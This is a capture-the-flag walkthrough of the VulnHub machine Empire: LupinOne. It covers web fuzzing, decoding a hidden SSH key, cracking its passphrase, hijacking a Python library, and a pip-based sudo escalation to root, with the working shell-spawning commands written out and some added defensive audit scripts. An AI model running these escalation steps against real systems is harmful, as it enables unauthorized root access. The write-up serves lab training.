Empire: LupinOne || VulnHub Complete Walkthrough

Previously, we have completed a few single and series vulnerable boxes. If you have not yet read them, click here:

Vulhub - Vulnerable By Design



Empire: LupinOne is a medium-difficulty vulnerable machine designed by icex64 and Empire Cybersecurity.


Setting Up

Firstly, download the zip file from VulnHub:

Empire: Lupin One



On completion, extract the file.

Open VirtualBox, click New, and fill in the name, type, and version.

Click Next to set the memory size, then browse to the existing virtual disk file.

On completion, check that the Network Adapter is set to Host-only Adapter.

Once the settings are done, start the VM.

The instance is now ready, and we are greeted by a terminal screen prompting for a password.


Enumeration

Our first step is to find the target IP address using netdiscover.

┌─[✗]─[mrdev@TS]─[~]
└──╼ $ sudo netdiscover -i vboxnet0

 Currently scanning: 192.168.67.0/16   |   Screen View: Unique Hosts                                                               
                                                                                                                                   
 2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 102                                                                   
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.100  08:00:27:58:48:94      1      42  PCS Systemtechnik GmbH                                                          
 192.168.56.112  08:00:27:0b:fe:31      1      60  PCS Systemtechnik GmbH     

From the scan result, we have discovered our target IP address: 192.168.56.112.

Now that we have the IP address, the next step is a port scan to find out which ports are open. This is an essential part of enumeration: it tells us the attack surface and lets us plan targeted tests. As in most cases, we use the famous Nmap tool:


Conducting Network Scans with Nmap

  • -sC: perform a script scan using the default set of scripts,
  • -sV: enable version detection, which reports what software versions are running on which ports.

┌─[✗]─[mrdev@TS]─[~]
└──╼ $ nmap -sC -sV 192.168.56.112
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-10 16:39 IST
Nmap scan report for 192.168.56.112
Host is up (0.056s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 ed:ea:d9:d3:af:19:9c:8e:4e:0f:31:db:f2:5d:12:79 (RSA)
|   256 bf:9f:a9:93:c5:87:21:a3:6b:6f:9e:e6:87:61:f5:19 (ECDSA)
|_  256 ac:18:ec:cc:35:c0:51:f5:6f:47:74:c3:01:95:b4:0f (ED25519)
80/tcp open  http    Apache httpd 2.4.48 ((Debian))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry 
|_/~myfiles
|_http-server-header: Apache/2.4.48 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.00 seconds
┌─[mrdev@TS]─[~]
└──╼ $

From the Nmap output, we have spotted two open ports.

  • Port 22/TCP runs an SSH service, so a valid username and password (or key) would give us direct access to the server.
  • Port 80/TCP runs an HTTP service, which indicates that there is probably a website running.

Web Enumeration

If you take a look at the Nmap output below, you will see a robots.txt file disallowing a directory called /~myfiles on the web server.

80/tcp open  http    Apache httpd 2.4.48 ((Debian))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt : 1 disallowed entry 
|_ /~myfiles
|_http-server-header: Apache/2.4.48 (Debian)

Let’s look at the contents ourselves: open a web browser of your choice and navigate to the target's IP address in the URL bar.

The robots.txt file lists one path that is disallowed from being crawled. Let’s visit it.

We began the enumeration by requesting the /~myfiles page. The server responded with a 404 error, which seemed suspicious.

In older Apache server setups, a path beginning with the tilde symbol (~) referred to the home directory of a user.

That is not the case on newer versions, so instead we can look for other paths that start with the same symbol (~).

Let’s take a look at the page source for a clue to a foothold on the instance.

There is nothing else special in the page source, so let’s move on to the next steps.


Foothold

Let’s find the hidden directories and files on the web server; this step is also categorized as fuzzing. The tool we are going to use is FFUF (a fast web fuzzer). FFUF does not come pre-installed with Kali Linux, so we have to install it separately.


Discovery of Hidden Directories and files with FFUF

Let’s perform fuzzing to find hidden files and directories.

  • -c: colorize the output,
  • -u: set the target URL,
  • -w: set the wordlist file path.

┌─[mrdev@TS]─[~]
└──╼ $ ffuf -c -u http://192.168.56.112/~FUZZ -w /usr/share/wordlists/dirb/common.txt 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.56.112/~FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

secret                  [Status: 301, Size: 318, Words: 20, Lines: 10]
:: Progress: [4614/4614] :: Job [1/1] :: 1022 req/sec :: Duration: [0:00:11] :: Errors: 0 ::
┌─[mrdev@TS]─[~]
└──╼ $

The scan identified ‘secret’ as a valid directory name on the server, so let us open this directory in the browser.

The page contained three major hints for the machine.

  1. First, there is a hidden file containing an SSH private key.
  2. Second, there is a wordlist that will help us crack the passphrase protecting that key.
  3. Finally, the hint mentions a best friend, who is possibly a username.

So, our first task is to find the hidden file that contains the SSH key. To do that we use FFUF once more, this time with three new parameters.

  • -ic: ignore wordlist comments,
  • -fc: filter out responses with the given HTTP status codes,
  • -e: specify the list of extensions to append to each word.

┌─[mrdev@TS]─[~]
└──╼ $ ffuf -c -ic -u http://192.168.56.112/~secret/.FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -fc 403 -e .txt,.html

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.56.112/~secret/.FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
 :: Extensions       : .txt .html 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response status: 403
________________________________________________

                        [Status: 200, Size: 331, Words: 52, Lines: 6]
                        [Status: 200, Size: 331, Words: 52, Lines: 6]
mysecret.txt            [Status: 200, Size: 4689, Words: 1, Lines: 2]
:: Progress: [262953/262953] :: Job [1/1] :: 456 req/sec :: Duration: [0:09:29] :: Errors: 0 ::
┌─[mrdev@TS]─[~]
└──╼ $

After the scan completed, we identified one file that returned a 200 response from the server. So, let us open that file in the browser.

Opening the file takes us to a page containing an encoded string. We need to work out the encoding in order to recover the actual SSH key.


Decoding the Encoded Text with CyberChef

Visit CyberChef. To learn more:

CyberChef: The Cyber Swiss Army Knife




Paste the string into the input pane and drag and drop operations into the recipe until the output makes sense. After some analysis, I found that the string is encoded with Base58.

The string decoded without any errors, and the output is an SSH private key that can be used for SSH login on the target machine.

Save the key into a file using the nano text editor. (Make sure the file is readable only by you, i.e. mode 600; otherwise the ssh client will refuse to use it.)
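As an added example (not part of the original walkthrough), here is a small Python Base58 codec that does offline what the CyberChef recipe does, plus a check that the decoded bytes look like a PEM private key. It assumes the Bitcoin-style alphabet, which is what CyberChef's From Base58 operation uses by default; the sample key text is constructed for the demo and is not the box's real key.

```python
# Base58 decode/encode (Bitcoin alphabet, CyberChef's default) plus a check that the
# decoded bytes look like a PEM private key. Added example, not from the walkthrough.
ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
INDEX = {ch: i for i, ch in enumerate(ALPHABET)}


def b58decode(text: str) -> bytes:
    """Decode Base58 text; whitespace/newlines (copied from a web page) are ignored."""
    text = "".join(text.split())
    value = 0
    for ch in text:
        if ch not in INDEX:
            raise ValueError(f"not a Base58 character: {ch!r}")
        value = value * 58 + INDEX[ch]
    body = value.to_bytes((value.bit_length() + 7) // 8, "big") if value else b""
    # Each leading '1' stands for one leading zero byte that the integer lost.
    leading_zeros = len(text) - len(text.lstrip("1"))
    return b"\x00" * leading_zeros + body


def b58encode(data: bytes) -> str:
    """Inverse of b58decode, used here to build test input."""
    value = int.from_bytes(data, "big")
    digits = []
    while value:
        value, rem = divmod(value, 58)
        digits.append(ALPHABET[rem])
    leading_zeros = len(data) - len(data.lstrip(b"\x00"))
    return "1" * leading_zeros + "".join(reversed(digits))


def looks_like_private_key(data: bytes) -> bool:
    """True for PEM-style key material (OpenSSH, RSA, EC ...) regardless of key type."""
    return data.startswith(b"-----BEGIN ") and b"PRIVATE KEY-----" in data


def recover_key(encoded: str):
    """Decode and return the key bytes, or None if the output is not a PEM private key."""
    data = b58decode(encoded)
    return data if looks_like_private_key(data) else None


# Constructed stand-in for what the page served; NOT the real key from the box.
SAMPLE_KEY = (b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
              b"EXAMPLE-ONLY-NOT-A-REAL-KEY\n"
              b"-----END OPENSSH PRIVATE KEY-----\n")
SAMPLE_ENCODED = b58encode(SAMPLE_KEY)

if __name__ == "__main__":
    key = recover_key(SAMPLE_ENCODED)
    print(key.decode() if key else "decoded data is not a PEM private key")
```

The leading-'1' handling matters: Base58 treats the input as one big integer, so leading zero bytes vanish unless they are counted separately, and a key file that decodes to the wrong length will not load.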

┌─[mrdev@TS]─[~]
└──╼ $ sudo nano ssh_key.rsa
[sudo] password for mrdev: 


Cracking the SSH Key Passphrase with John the Ripper

Since the author has shared hints about the passphrase for the SSH key, we are going to use ssh2john to convert the key into a hash that John the Ripper can attack.

┌─[✗]─[mrdev@TS]─[~]
└──╼ $ locate ssh2john
/usr/share/john/ssh2john.py
┌─[mrdev@TS]─[~]
└──╼ $ /usr/share/john/ssh2john.py ssh_key.rsa > ssh_hash
┌─[mrdev@TS]─[~]
└──╼ $ cat ssh_hash 
ssh_key.rsa:$sshng$2$16$f2df77361693c16003677b8a33deeb06$2486$[...]$16$614
┌─[mrdev@TS]─[~]
└──╼ $

Now, run John the Ripper to crack the hash value. 

┌─[mrdev@TS]─[~]
└──╼ $ john --wordlist=/usr/share/wordlists/fasttrack.txt ssh_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
P@55w0rd!        (ssh_key.rsa)
P@55w0rd!        (ssh_key.rsa)
P@55w0rd!        (ssh_key.rsa)
3g 0:00:00:17 DONE (2022-02-10 19:14) 0.1690g/s 12.50p/s 12.50c/s 12.50C/s 2003..starwars
Session completed
┌─[mrdev@TS]─[~]
└──╼ $

From the output, we obtained the passphrase: P@55w0rd!


Establishing SSH Connection with SSH Key Authentication

Now that we have a username (from the hint) and the key's passphrase, let's connect over SSH using the private key.

┌─[✗]─[mrdev@TS]─[~]
└──╼ $ ssh -i ssh_key.rsa icex64@192.168.56.112
Enter passphrase for key 'ssh_key.rsa': p@55w0rd!
Linux LupinOne 5.10.0-8-amd64 #1 SMP Debian 5.10.46-5 (2021-09-23) x86_64
########################################
Welcome to Empire: Lupin One
########################################
Last login: Thu Oct  7 05:41:43 2021 from 192.168.26.4
icex64@LupinOne:~$ 

We successfully authenticated and got a secure shell as the user icex64. Next, run the ls command to list the files in the home directory. As a result, we found user.txt.

icex64@LupinOne:~$ cd /home
icex64@LupinOne:/home$ ls
arsene  icex64
icex64@LupinOne:~$ ls
user.txt
icex64@LupinOne:~$ cat user.txt 
    ...,    ,...    ..,.   .,,  *&@@@@@@@@@@&/.    ,,,.   .,..    ...,    ...,  
    ,,,.    .,,,    *&@@%%%%%%%%%%%%%%%%%%%%%%%%%%%&@,.   ..,,    ,,,,    ,,,.  
..,.    ,..,  (@&#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%&%,.    ..,,    ,...    ..
    .... .@&%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@  ....    ....    ,...  
    .,#@%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@  .,..    ,.,.    ...,  
.,,,&%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@#@.,    .,.,    .,..    .,
...@%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%&@####@*.    ..,,    ....    ,.
   @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@@%#######@% .,.,    .,.,    .,.,  
..,,@@%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@@@@@@@@%#######@@,    ..,.    ,..,    ..
.,,, @@@@@@@@&%%%%%%%%%%%%%&@@@@@@@@@@@@@@@@@@@%%%#####@@,    .,,,    ,,.,    .,
    ..@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%###@@ .,..    ...,    ....  
...,  .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%#&@.    ...,    ...,    ..
....   #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%%%@.    ....    ....    ..
    .,.,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&%%%%%%%#@*.,.,    .,.,    ..@@@@
..,.    .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%#@@    ..,.    ,..*@&&@@.
.,,.    ,.@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%%@@    .,,.    .@&&&@( ,,
    ,.,.  .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&%%%%%%%@@%%&@@@, ,,,@&@@@.,,,  
....    ...#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&&%%%%&%,@%%%%%%%#@@@@@%..    ..
...,    ...,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&&&&@,*,,@%%%%%%@@@&@%%@..    ..
    ,,.,    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@/,***,*,@%%%@@&@@@%%###@ ,,.,  
    .,. @@&&&@@,,/@@@@@@@@@@@@@@@@@@@@@@@@#,,,,,,,,,*,,@%%%@&&@@%%%%%##&* ,...  
.,,, @@&@@&@&@@%,*,*,*,*,***,*,*,***,*,*,*,*,*,*,**,&@%%&@@@&@%%%%%%%%@/.,    .,
  /@@&&&&&&&&&&@@*,,,,,,,,,,,,,,,,,,,,,,*,,,**,%@&%%%%@&&&@%%%%%%%%%@(    ,..,  
 @&@&@&@&@&@&@&&@@@@@(,*,*,,**,*,*,,,*#&@@&%%%%%%%%&@@@@@%%%%%%%%@&..,    .,.,  
@@@&&&&&&&&&&&&&&&&&@@@&&&@@@@&&@@&&@&&&%&%%%%%%%@&&&@&%%%%%%&@,..    ...,    ..
 @&&&@&@&@&@&@&@&@&@&@&@&@&@&&@@@&&&&&&&%&%%%%&@&&@@%%%#&@%..,    .,.,    .,.,  
  @@@@&&&&&&&&&&&&&&&&&&&&&&@&&&&&&&&&&&%%&%@&@&@&@@%..   ....    ....    ,..,  
.,,, *@@&&&@&@&@&@&@&@&&&&&&&&&&&&&&&&&%&&@@&&@....    ,.,    .,,,    ,,..    .,
    ,,,,    .,%@@@@@@@@@@@@@@@@%,  ...,@@&&@(,,    ,,,.   .,,,    ,,.,    .,,.  
    .,.,    .,,,    .,,.   ..,.    ,*@@&&@ ,,,,    ,.,.   .,.,    .,.,    .,.,  
...,    ....    ....    ,..    ,..@@@&@#,..    ....    ,..    ...,    ....    ..
    ....    ....    ...    ....@.,%&@..    ....    ...    ....    ....    ....  
    ...,    ....    ....   .*/,...&.,,,    ....    ....   .,..    ...,    ...,  
.,.,    .,.,    ,,.,    .,../*,,&,,    ,.,,    ,.,,    ..,    .,.,    .,.,    ,,

3mp!r3{I_See_That_You_Manage_To_Get_My_Bunny}
icex64@LupinOne:~$ 

Since the current shell does not have root permissions, let’s gather further information about the target machine that could be useful for gaining root access.


Privilege Escalation

Let's identify the rights, and privileges of the current user by executing the sudo -l command. 

icex64@LupinOne:~$ sudo -l
Matching Defaults entries for icex64 on LupinOne:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User icex64 may run the following commands on LupinOne:
    (arsene) NOPASSWD: /usr/bin/python3.9 /home/arsene/heist.py
icex64@LupinOne:~$

From the output, icex64 may run /home/arsene/heist.py with /usr/bin/python3.9 as the user arsene without a password. A script run this way may be vulnerable to Python library hijacking if the invoking user can modify any module the script imports. You can find out more about this technique by searching on Google.


Python Library Hijacking

Let’s take a look at the contents of the Python script.

icex64@LupinOne:~$ cat /home/arsene/heist.py
import webbrowser

print ("Its not yet ready to get in action")

webbrowser.open("https://empirecybersecurity.co.mz")
icex64@LupinOne:~$

Upon reviewing the code, we see that the script prints a message and then opens the URL in a web browser; the only module it imports is webbrowser.

To elevate privileges, we can inject a command that spawns a shell into that library and rerun the program. First, use the locate command to find where the library lives.

icex64@LupinOne:~$ locate webbrowser
/usr/lib/python3.9/__pycache__/webbrowser.cpython-39.pyc
/usr/lib/python3.9/webbrowser.py
icex64@LupinOne:~$

From the output, we have obtained the location of the Python library: /usr/lib/python3.9/webbrowser.py.

Before starting the library hijacking, list the file's details to check whether the current user already has write permission on it.

icex64@LupinOne:~$ ls -al /usr/lib/python3.9/webbrowser.py
-rwxrwxrwx 1 root root 24110 Feb 10 08:54 /usr/lib/python3.9/webbrowser.py
icex64@LupinOne:~$
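The manual ls -al check above is what an administrator should automate when reviewing any script that sudo lets a user run as someone else. The following is an added example (not the box's code): it parses a script's imports, resolves each module with importlib, and reports whether the module file or its directory is group- or world-writable (a writable directory is enough, since a same-named file dropped there would shadow the real module). The heist.py text is a constructed copy of what the walkthrough shows, and the paths it resolves come from whatever Python runs it, not from the target.

```python
# Audit which modules a script imports and whether someone other than the owner could
# alter them. Added example, not the box's code; HEIST_PY is a constructed copy of the
# script shown in the walkthrough.
import ast
import importlib.util
import os
import stat
import tempfile

HEIST_PY = '''import webbrowser

print ("Its not yet ready to get in action")

webbrowser.open("https://empirecybersecurity.co.mz")
'''


def imported_modules(source: str) -> list:
    """Top-level names of every module the script imports (import x / from x import y)."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)


def writable_by_others(path: str) -> bool:
    """Group- or world-writable bit set: anyone but the owner can alter the file/dir."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_script(source: str) -> list:
    """For each import, resolve the module file and report loose permissions on the
    file and on its directory (a writable directory lets a module be dropped in)."""
    findings = []
    for name in imported_modules(source):
        spec = importlib.util.find_spec(name)
        origin = spec.origin if spec else None
        entry = {"module": name, "path": origin, "file_writable": False, "dir_writable": False}
        if origin and os.path.isfile(origin):  # skips built-in/frozen modules
            entry["file_writable"] = writable_by_others(origin)
            entry["dir_writable"] = writable_by_others(os.path.dirname(origin))
        findings.append(entry)
    return findings


def demo_permission_check():
    """Show the check on a constructed file: first mode 777 (as on the box), then 644."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "webbrowser.py")
        with open(path, "w") as fh:
            fh.write("# constructed stand-in module\n")
        os.chmod(path, 0o777)
        loose = writable_by_others(path)
        os.chmod(path, 0o644)
        tight = writable_by_others(path)
    return loose, tight


if __name__ == "__main__":
    for f in audit_script(HEIST_PY):
        flag = "WRITABLE" if f["file_writable"] or f["dir_writable"] else "ok"
        print(f"{f['module']:<12} {f['path']}  [{flag}]")
    print("mode 777 flagged, mode 644 flagged:", demo_permission_check())
```

On a correctly configured system every entry comes back "ok"; the fix for a finding is the usual one (chmod 644, owner root) on the module, plus checking the script's own directory, which Python searches first.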

The file is world-writable (-rwxrwxrwx), which is the misconfiguration that makes hijacking possible. Now open the Python script with nano to edit it.

icex64@LupinOne:~$ nano /usr/lib/python3.9/webbrowser.py

Now add the line below to the script so that a shell is spawned when the module is imported.

os.system("/bin/bash")

Let’s execute the Python script via sudo to switch to the user arsene.

icex64@LupinOne:~$ sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py
arsene@LupinOne:/home/icex64$

We have switched to the user arsene, but we still don't have root privileges, so let's again identify the rights and privileges of the current user.

arsene@LupinOne:/home/icex64$ sudo -l
Matching Defaults entries for arsene on LupinOne:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User arsene may run the following commands on LupinOne:
    (root) NOPASSWD: /usr/bin/pip
arsene@LupinOne:/home/icex64$
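Both sudo -l listings on this box (icex64 above, and arsene here) show the same class of problem: a NOPASSWD rule whose binary hands the run-as user arbitrary code execution. The following is an added example, not the box's code, of a small audit script that parses sudo -l output and flags such rules with the reason a reviewer should record; the two sample outputs are constructed copies of what the walkthrough shows, and the risk categories are an assumption based on the common GTFOBins pattern, not an exhaustive list.

```python
# Parse `sudo -l` output and flag rules that hand the run-as user arbitrary code
# execution (the GTFOBins pattern). Added example, not the box's code; the two sample
# outputs are constructed copies of what icex64 and arsene saw on the box.
import re

SUDO_L_ICEX64 = r"""Matching Defaults entries for icex64 on LupinOne:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User icex64 may run the following commands on LupinOne:
    (arsene) NOPASSWD: /usr/bin/python3.9 /home/arsene/heist.py
"""

SUDO_L_ARSENE = r"""Matching Defaults entries for arsene on LupinOne:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User arsene may run the following commands on LupinOne:
    (root) NOPASSWD: /usr/bin/pip
"""

# (basename pattern, category, what a reviewer should verify or change); an assumption
# covering the usual offenders, not a complete list.
RISK_RULES = [
    (re.compile(r"^(python|perl|ruby|php|node|lua)[\d.]*$"), "interpreter",
     "runs a script: the script, its directory and every module it imports must not be writable by the invoking user"),
    (re.compile(r"^(pip|pip3|gem|npm)[\d.]*$"), "package_manager",
     "installs from any path given on the command line, so the invoker controls code that runs as the run-as user"),
    (re.compile(r"^(sh|bash|dash|zsh)$"), "shell", "is itself a shell"),
    (re.compile(r"^(vi|vim|nano|less|more)$"), "editor_or_pager", "can spawn a shell or write arbitrary files"),
]

# "(runas) TAG: TAG: command args" as printed by sudo -l
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def classify(command: str):
    """Category and reason for the first word (the binary) of a sudo command spec."""
    if command == "ALL":
        return "all", "unrestricted command list"
    base = command.split()[0].rsplit("/", 1)[-1]
    for pattern, category, reason in RISK_RULES:
        if pattern.match(base):
            return category, reason
    return "unknown", "review manually"


def audit_sudo_l(output: str) -> list:
    """Return one dict per command rule found after the 'may run the following' header."""
    entries, user, in_rules = [], None, False
    for line in output.splitlines():
        header = re.match(r"^User (\S+) may run the following commands", line)
        if header:
            user, in_rules = header.group(1), True
            continue
        match = ENTRY_RE.match(line) if in_rules else None
        if not match:
            continue
        command = match.group("cmd").strip()
        category, reason = classify(command)
        entries.append({
            "user": user,
            "runas": match.group("runas").strip(),
            "nopasswd": "NOPASSWD:" in match.group("tags"),
            "command": command,
            "category": category,
            "reason": reason,
        })
    return entries


def flagged(output: str) -> list:
    """Only the rules that need attention."""
    return [e for e in audit_sudo_l(output) if e["category"] != "unknown"]


if __name__ == "__main__":
    for sample in (SUDO_L_ICEX64, SUDO_L_ARSENE):
        for e in flagged(sample):
            print(f"{e['user']} -> ({e['runas']}) {e['command']}: {e['category']}; {e['reason']}")
```

Run against the two samples it flags the python3.9 rule (interpreter) and the pip rule (package manager); the remediation in both cases is to drop the rule or replace it with a wrapper that takes no caller-controlled paths.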

The output shows that arsene may run /usr/bin/pip as root without a password. This is a known privilege escalation vector, usually referred to as pip privilege escalation.


PIP Privilege Escalation

You will find detailed information by searching on Google, or on GTFOBins:

GTFOBins: pip



Copy each of the commands below and paste them into the terminal one by one to get a root shell.

arsene@LupinOne:/home/icex64$ TF=$(mktemp -d)
arsene@LupinOne:/home/icex64$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
arsene@LupinOne:/home/icex64$ sudo pip install $TF
Processing /tmp/tmp.UqEhvH8ffJ
# whoami
root
#

Finally, we have a root shell, verified with the whoami command. Now that we have proven we are root, simply change directory to /root to obtain the root flag.

# cd /root
# ls
root.txt
# cat root.txt
*,,,,,,,,,,,,,,,,,,,,,,,,,,,,,(((((((((((((((((((((,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,                       .&&&&&&&&&(            /&&&&&&&&&                       
,                    &&&&&&*                          @&&&&&&                   
,                *&&&&&                                   &&&&&&                
,              &&&&&                                         &&&&&.             
,            &&&&                   ./#%@@&#,                   &&&&*           
,          &%&&          &&&&&&&&&&&**,**/&&(&&&&&&&&             &&&&          
,        &@(&        &&&&&&&&&&&&&&&.....,&&*&&&&&&&&&&             &&&&        
,      .& &          &&&&&&&&&&&&&&&      &&.&&&&&&&&&&               &%&       
,     @& &           &&&&&&&&&&&&&&&      && &&&&&&&&&&                @&&&     
,    &%((            &&&&&&&&&&&&&&&      && &&&&&&&&&&                 #&&&    
,   &#/*             &&&&&&&&&&&&&&&      && #&&&&&&&&&(                 (&&&   
,  %@ &              &&&&&&&&&&&&&&&      && ,&&&&&&&&&&                  /*&/  
,  & &               &&&&&&&&&&&&&&&      &&* &&&&&&&&&&                   & &  
, & &                &&&&&&&&&&&&&&&,     &&& &&&&&&&&&&(                   &,@ 
,.& #                #&&&&&&&&&&&&&&(     &&&.&&&&&&&&&&&                   & & 
*& &                 ,&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&             &(&
*& &                 ,&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&            & &
*& *              &&&&&&&&&&&&&&&&&&&@.                 &&&&&&&&             @ &
*&              &&&&&&&&&&&&&&&&&&@    &&&&&/          &&&&&&                & &
*% .           &&&&&&&&&&&@&&&&&&&   &  &&(  #&&&&   &&&&.                   % &
*& *            &&&&&&&&&&   /*      @%&%&&&&&&&&    &&&&,                   @ &
*& &               &&&&&&&           & &&&&&&&&&&     @&&&                   & &
*& &                    &&&&&        /   /&&&&         &&&                   & @
*/(,                      &&                            &                   / &.
* & &                     &&&       #             &&&&&&      @             & &.
* .% &                    &&&%&     &    @&&&&&&&&&.   %@&&*               ( @, 
/  & %                   .&&&&  &@ @                 &/                    @ &  
*   & @                  &&&&&&    &&.               ,                    & &   
*    & &               &&&&&&&&&& &    &&&(          &                   & &    
,     & %           &&&&&&&&&&&&&&&(       .&&&&&&&  &                  & &     
,      & .. &&&&&&&&&&&&&&&&&&&&&&&&&&&&*          &  &                & &      
,       #& & &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&        &.             %  &       
,         &  , &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&.     &&&&          @ &*        
,           & ,, &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&.  /&&&&&&&&    & &@          
,             &  & #&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&  &&&&&&&@ &. &&            
,               && /# /&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&# &&&# &# #&               
,                  &&  &( .&&&&&&&&&&&&&&&&&&&&&&&&&&&  &&  &&                  
/                     ,&&(  &&%   *&&&&&&&&&&%   .&&&  /&&,                     
,                           &&&&&/...         .#&&&&#                           

3mp!r3{congratulations_you_manage_to_pwn_the_lupin1_box}
See you on the next heist.

Congratulations on completing the CTF challenge.
